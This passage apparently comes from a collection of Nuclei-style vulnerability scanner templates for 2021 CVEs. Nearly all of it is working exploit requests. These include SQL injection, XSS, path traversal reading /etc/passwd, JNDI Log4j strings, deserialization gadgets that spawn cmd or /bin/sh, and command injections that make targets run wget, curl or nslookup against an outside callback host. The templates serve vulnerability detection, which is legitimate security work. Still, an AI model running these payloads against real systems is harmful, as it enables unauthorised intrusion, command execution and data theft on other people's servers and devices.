\"\")","contains(body_3, \"Affiliates Manager Click Tracking\")"],"condition":"and"}]}]},{"id":"CVE-2021-27670","info":{"name":"Appspace 6.2.4 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["

    Interactsh Server

    "]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24731","info":{"name":"Pie Register < 3.7.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-json/pie/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nuser_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"User credentials are invalid.\")"],"condition":"and"}]}]},{"id":"CVE-2021-21799","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Telnet "]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31249","info":{"name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: setting.htm",""],"condition":"and"},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-23241","info":{"name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginLess/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40868","info":{"name":"Cloudron 6.2 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":[""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33564","info":{"name":"Ruby Dragonfly <1.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==","{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44528","info":{"name":"Open Redirect in Host Authorization Middleware","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: //interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[301,302,307,308]}]}]},{"id":"CVE-2021-25646","info":{"name":"Apache Druid - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"type\":\"index\",\n\"spec\":{\n \"ioConfig\":{\n \"type\":\"index\",\n \"firehose\":{\n \"type\":\"local\",\n \"baseDir\":\"/etc\",\n \"filter\":\"passwd\"\n }\n },\n \"dataSchema\":{\n \"dataSource\":\"odgjxrrrePz\",\n \"parser\":{\n \"parseSpec\":{\n \"format\":\"javascript\",\n \"timestampSpec\":{\n\n },\n \"dimensionsSpec\":{\n\n },\n \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n \"\":{\n \"enabled\":\"true\"\n }\n }\n }\n }\n},\n\"samplerConfig\":{\n \"numRows\":10\n}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["numRowsRead","numRowsIndexed"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24150","info":{"name":"WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25079","info":{"name":"Contact Form Entries < 1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, '') && contains(body_2, 'contact-form')"],"condition":"and"}]}]},{"id":"CVE-2021-42551","info":{"name":"NetBiblio WebOPAC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x","{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SearchTerm: 'x'+alert(1)+'x',","SearchTerm: 'x\\\\'+alert(1),//',"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["NetBiblio"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3297","info":{"name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /status.htm HTTP/1.1\nHost: {{Hostname}}\nCookie: language=en; login=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Running Time","Firmware Version","Firmware Build Time"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22005","info":{"name":"VMware vCenter Server - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\ntest_data\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 201","contains(body_1, 'VMware vSphere')","content_length_2 == 0"],"condition":"and"}]}]},{"id":"CVE-2021-24387","info":{"name":"WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","/wp-content/themes/realestate"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34370","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-21973","info":{"name":"VMware vSphere - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHost: {{Hostname}}\nVcip: {{interactsh-url}}\nVcpassword: {{rand_base(6)}}\nVcusername: {{rand_base(6)}}\nReqresource: {{rand_base(6)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The server sent HTTP status code 200"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24235","info":{"name":"WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["input/Autofocus/%0D*/Onfocus=alert(123);","goto-tour-list-js-extra"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29156","info":{"name":"LDAP Injection In OpenAM","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/ui/PWResetUserValidation","{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation","{{BaseURL}}/ui/PWResetUserValidation"],"matchers":[{"type":"dsl","dsl":["contains(body, \"jato.pageSession\") && status_code==200"]}]}]},{"id":"CVE-2021-31755","info":{"name":"Tenda Router AC11 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/setmac HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/index.htmlr\nContent-Type: application/x-www-form-urlencoded\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-42567","info":{"name":"Apereo CAS Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cas/v1/tickets/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["","java.util.HashMap"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24145","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\nContent-Type: text/csv\n\n\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"mec-ix-action\"\n\nimport-start-bookings\n-----------------------------132370916641787807752589698875--\n","GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2021-35250","info":{"name":"SolarWinds Serv-U 15.3 - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n/?Command=NOOP\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24389","info":{"name":"WordPress FoodBakery <2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40960","info":{"name":"Galera WebTemplate 1.0 Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38314","info":{"name":"WordPress Redux Framework <=4.2.11 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body)<50"]},{"type":"regex","name":"meme","part":"body","regex":["[a-f0-9]{32}"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["[a-f0-9]{32}"],"part":"body"}]}]},{"id":"CVE-2021-21389","info":{"name":"BuddyPress REST API <7.2.1 - Privilege Escalation/Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-json/buddypress/v1/signup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\n \"user_login\":\"{{randstr}}\",\n \"password\":\"{{randstr}}\",\n \"user_name\":\"{{randstr}}\",\n \"user_email\":\"{{randstr}}@interact.sh\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["user_login","registered","activation_key","user_email"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37573","info":{"name":"Tiny Java Web Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["

    404 test not found

    "]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-42667","info":{"name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32305","info":{"name":"Websvn <2.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40978","info":{"name":"MKdocs 1.2.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24316","info":{"name":"WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Sorry, no posts matched your criteria."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20031","info":{"name":"SonicWall SonicOS 7.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{randstr}}.tld\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["https://{{randstr}}.tld/auth.html","Please be patient as you are being re-directed"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34429","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /%u002e/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /.%00/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25085","info":{"name":"WOOF WordPress plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"additional_fields\":[\"\"]}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42237","info":{"name":"Sitecore Experience Platform Pre-Auth RCE","severity":"critical"},"requests":[{"raw":["POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n\n\n \n foo\n \n \n \n 2\n \n <_comparison z:Id=\"4\" z:FactoryType=\"a:DelegateSerializationHolder\" z:Type=\"System.DelegateSerializationHolder\" z:Assembly=\"0\"\n xmlns=\"http://schemas.datacontract.org/2004/07/System.Collections.Generic\"\n xmlns:a=\"http://schemas.datacontract.org/2004/07/System\">\n \n mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\n \n \n \n Compare\n \n \n System.String\n System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\n \n Start\n \n System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\n System.Diagnostics.Process\n System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\n \n \n \n \n \n System.Diagnostics.Process Start(System.String, System.String)\n System.Diagnostics.Process Start(System.String, System.String)\n 8\n \n \n \n \n \n \n Int32 Compare(System.String, System.String)\n System.Int32 Compare(System.String, System.String)\n 8\n \n \n \n \n 2\n \n /c nslookup {{interactsh-url}}\n cmd\n \n \n \n \n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["System.ArgumentNullException"]}]}]},{"id":"CVE-2021-25297","info":{"name":"Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Ping","Switch Details"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-45046","info":{"name":"Apache Log4j2 - Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\nAccept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":null},{"type":"regex","group":2,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]},{"type":"regex","group":1,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-24358","info":{"name":"Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-20038","info":{"name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"prefix_addr":["%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"],"system_addr":["%08%b7%06%08","%64%b8%06%08"]},"attack":"clusterbomb","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-21351","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n\n \n ysomap\n \n \n \n -10086\n \n <__overrideDefaultParser>false\n false\n false\n \n \n \n \n \n false\n false\n \n \n \n \n 1008\n true\n 1000\n 0\n 2\n 0\n 0\n 0\n true\n 1004\n false\n rmi://{{interactsh-url}}/test\n \n \n \n \n \n \n \n \n \n com.sun.rowset.JdbcRowSetImpl\n setAutoCommit\n \n boolean\n \n \n \n false\n \n \n false\n \n false\n \n -1\n false\n false\n \n 1\n \n 1\n false\n \n \n \n ysomap\n \n test\n \n \n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-46068","info":{"name":"Vehicle Service Management System - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin\n","GET /admin/?page=user HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"Administrator\\\"> Admin\")"],"condition":"and"}]}]},{"id":"CVE-2021-37833","info":{"name":"Hotel Druid 3.0.2 - Cross-Site 